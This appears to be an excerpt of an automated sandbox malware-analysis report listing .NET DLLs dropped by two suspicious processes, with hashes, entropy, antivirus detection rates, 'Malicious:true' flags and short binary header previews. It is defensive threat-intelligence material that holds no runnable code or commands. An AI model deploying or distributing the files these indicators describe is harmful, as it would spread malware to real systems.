                                                                                  Size (bytes):89600
                                                                                  Entropy (8bit):5.905167202474779
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: DWTukBG9R7.exe, Detection: malicious, Browse
                                                                                  • Filename: CPNSQusnwC.exe, Detection: malicious, Browse
                                                                                  • Filename: xoCq1tvPcm.exe, Detection: malicious, Browse
                                                                                  • Filename: Dfim58cp4J.exe, Detection: malicious, Browse
                                                                                  • Filename: eu6OEBpBCI.exe, Detection: malicious, Browse
                                                                                  • Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: gorkmTnChA.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):39936
                                                                                  Entropy (8bit):5.629584586954759
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):28160
                                                                                  Entropy (8bit):5.570953308352568
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                  MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                  SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                  SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                  SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):39936
                                                                                  Entropy (8bit):5.660491370279985
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):294912
                                                                                  Entropy (8bit):6.010605469502259
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.529329139831718
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):24064
                                                                                  Entropy (8bit):5.492504448438552
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                  MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                  SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                  SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                  SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 33%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):46592
                                                                                  Entropy (8bit):5.870612048031897
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22016
                                                                                  Entropy (8bit):5.41854385721431
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):38912
                                                                                  Entropy (8bit):5.679286635687991
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):126976
                                                                                  Entropy (8bit):6.057993947082715
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):294912
                                                                                  Entropy (8bit):6.010605469502259
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):64000
                                                                                  Entropy (8bit):5.857602289000348
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33280
                                                                                  Entropy (8bit):5.634433516692816
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.529329139831718
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):5.645950918301459
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):24576
                                                                                  Entropy (8bit):5.535426842040921
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):41472
                                                                                  Entropy (8bit):5.6808219961645605
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):5.932541123129161
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
